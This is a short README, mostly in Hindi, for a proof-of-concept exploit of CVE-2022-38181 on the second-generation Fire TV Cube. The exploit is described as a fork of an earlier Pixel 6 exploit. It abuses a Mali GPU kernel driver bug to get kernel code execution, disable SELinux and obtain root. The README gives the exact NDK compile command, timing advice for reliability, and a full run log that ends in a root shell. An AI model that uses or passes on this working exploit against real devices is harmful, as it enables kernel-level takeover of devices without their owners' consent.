
CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)
यह सुरक्षा शोधकर्ता Man Yue Mo के Pixel 6 POC का एक कांटा है CVE_2022_38181 के लिए। उनकी विस्तृत लेखनी यहाँ पढ़ें। FireOS के 32 बिट उपयोगकर्तास्थान के साथ-साथ दूसरी पीढ़ी के Cube के पुराने Bifrost ड्राइवरों (r16p0) और Linux कर्नेल (4.9.113) संस्करणों को ध्यान में रखते हुए परिवर्तन किए गए हैं। POC ARM Mali कर्नेल ड्राइवर में एक बग का शोषण करता है ताकि मनमाना कर्नेल कोड निष्पादन प्राप्त किया जा सके, जिसका उपयोग SELinux को अक्षम करने और रूट प्राप्त करने के लिए किया जाता है।
मैंने ndk-21 में clang के साथ संकलित करने के लिए निम्नलिखित कमांड का उपयोग किया:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker
सर्वोत्तम विश्वसनीयता के लिए Cube के बूट होने के 30-90 सेकंड बाद शोषण चलाया जाना चाहिए।
raven:/ $ /data/local/tmp/raven_shrinker
fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys
failed, retry.
failed, retry.
failed, retry.
failed, retry.
region freed 80
alias gpu va 100c85000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 2 0
Found freed_idx 2
Found pgd 23, 100cce000
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001c4 1c4
overwrite addr : 1043001c4 1c4
result 50
raven:/ #